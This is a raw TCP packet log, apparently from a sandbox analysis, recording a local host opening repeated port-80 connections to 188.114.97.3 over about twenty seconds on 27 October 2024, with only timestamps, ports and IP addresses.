                                                                                                                  Oct 27, 2024 19:24:12.150810957 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.151761055 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.156879902 CET8050108188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.156980038 CET5010880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.157176971 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.157440901 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.157521963 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.162942886 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.508647919 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:12.514292955 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.752188921 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:12.805596113 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.064238071 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.118001938 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.181189060 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.181840897 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.187274933 CET8050109188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.187371016 CET5010980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.187671900 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.187771082 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.187891006 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.193223000 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.542790890 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.548372984 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.745949030 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.751518011 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.751661062 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.751929998 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:13.757282019 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.798648119 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:13.852376938 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.021791935 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.071091890 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.102468014 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.108171940 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.108294964 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.172418118 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.177174091 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.178639889 CET8050110188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.178710938 CET5011080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.182588100 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.182667971 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.185909033 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.191364050 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.356313944 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.446108103 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.540019035 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.545562029 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.560854912 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.649554968 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.792488098 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:14.836767912 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:14.998650074 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.118488073 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.118571043 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.119200945 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.125001907 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.125205994 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.125442982 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.130810022 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.130872965 CET8050111188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.130955935 CET5011180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.130980015 CET8050112188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.131047010 CET5011280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.477507114 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:15.483078003 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.740102053 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:15.789849997 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.048201084 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.102349043 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.162218094 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.163045883 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.168092012 CET8050113188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.168173075 CET5011380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.168468952 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.168554068 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.168631077 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.173957109 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.526814938 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.532263041 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.759497881 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:16.805521965 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:16.955605030 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.008799076 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.081099033 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.081439972 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.086810112 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.086905003 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.086905956 CET8050114188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.086970091 CET5011480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.086993933 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.092302084 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.446266890 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.451956987 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.697381020 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.742970943 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:17.918967009 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:17.977350950 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.035929918 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.036633968 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.042516947 CET8050115188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.042553902 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.042649031 CET5011580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.042663097 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.042757034 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.048130989 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.399497032 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.405333042 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.647559881 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.696091890 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.838102102 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.838288069 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.838360071 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.960453033 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.961371899 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.966494083 CET8050116188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.966593981 CET5011680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.966810942 CET8050117188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:18.966897011 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.966994047 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:18.972544909 CET8050117188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.322119951 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.327837944 CET8050117188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.556583881 CET8050117188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.571986914 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.577459097 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.577558041 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.577697039 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.583157063 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.602518082 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.866328955 CET8050117188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.914907932 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.930756092 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.936451912 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.936566114 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.993839025 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.994450092 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:19.999933004 CET8050117188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:19.999979019 CET8050119188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.000195980 CET5011780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.000195980 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.000281096 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.006365061 CET8050119188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.179857016 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.227385998 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.352725983 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.358350992 CET8050119188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.386346102 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.430602074 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.596128941 CET8050119188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.649362087 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:20.906261921 CET8050119188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:20.963274956 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.022974968 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.023174047 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.023865938 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.028875113 CET8050118188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.028945923 CET5011880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.029247046 CET8050120188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.029324055 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.029426098 CET8050119188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.029495955 CET5011980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.031635046 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.037058115 CET8050120188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.413763046 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.419331074 CET8050120188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.634764910 CET8050120188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.680700064 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.851717949 CET8050120188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.899334908 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.986385107 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.987179041 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.992398977 CET8050120188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.992465019 CET5012080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.992615938 CET8050121188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:21.992717981 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.992827892 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:21.998687029 CET8050121188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:22.337152004 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:22.342888117 CET8050121188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:22.589334011 CET8050121188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:22.633620024 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:22.894195080 CET8050121188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:22.949491978 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.028338909 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.029191017 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.034199953 CET8050121188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:23.034537077 CET8050122188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:23.034795046 CET5012180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.034810066 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.034926891 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.040349960 CET8050122188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:23.388482094 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.394049883 CET8050122188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:23.624043941 CET8050122188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:23.664860010 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:23.918884039 CET8050122188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:23.961709976 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.033543110 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.033978939 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.044321060 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.044559002 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.044559002 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.046201944 CET8050122188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.046264887 CET5012280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.050018072 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.399300098 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.405807018 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.640912056 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.696191072 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.831068039 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.831273079 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.831407070 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.957269907 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.957603931 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.963124990 CET8050124188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.963232040 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.963299990 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.964032888 CET8050123188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:24.964231968 CET5012380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:24.969310999 CET8050124188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.321954966 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.327529907 CET8050124188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.400948048 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.407494068 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.407706022 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.407706022 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.413821936 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.590050936 CET8050124188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.633622885 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.758858919 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.764477015 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.764513016 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.794980049 CET8050124188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.836759090 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.913415909 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.914355040 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.919682026 CET8050124188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.919770956 CET5012480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.919914961 CET8050126188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:25.920002937 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.920197964 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:25.926037073 CET8050126188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.003123999 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.055773020 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.204607010 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.258620977 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.274313927 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.279922962 CET8050126188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.506963968 CET8050126188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.549941063 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.818957090 CET8050126188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.868005037 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.943017006 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.943067074 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.943525076 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.948909044 CET8050125188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.948946953 CET8050127188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.948987961 CET5012580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.949059010 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.949157953 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.949295044 CET8050126188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:26.949831009 CET5012680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:26.954462051 CET8050127188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:27.306215048 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.311769009 CET8050127188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:27.544910908 CET8050127188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:27.586740017 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.739195108 CET8050127188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:27.789890051 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.870450974 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.871454000 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.876543045 CET8050127188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:27.876784086 CET8050128188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:27.876873016 CET5012780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.876907110 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.877024889 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:27.882302999 CET8050128188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:28.227422953 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.232939959 CET8050128188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:28.502160072 CET8050128188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:28.586747885 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.815150023 CET8050128188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:28.883642912 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.946068048 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.947168112 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.952986956 CET8050128188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:28.953555107 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:28.953640938 CET5012880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.953665018 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.953830004 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:28.960220098 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:29.308504105 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.315722942 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:29.568263054 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:29.674299002 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.773999929 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:29.774049044 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:29.774142981 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.905438900 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:29.906616926 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.057266951 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.058343887 CET8050129188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.058439016 CET5012980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.058469057 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.058643103 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.063954115 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.414948940 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.420567036 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.670496941 CET8050130188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:24:30.867993116 CET5013080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:24:30.973568916 CET8050130188.114.97.3192.168.2.4
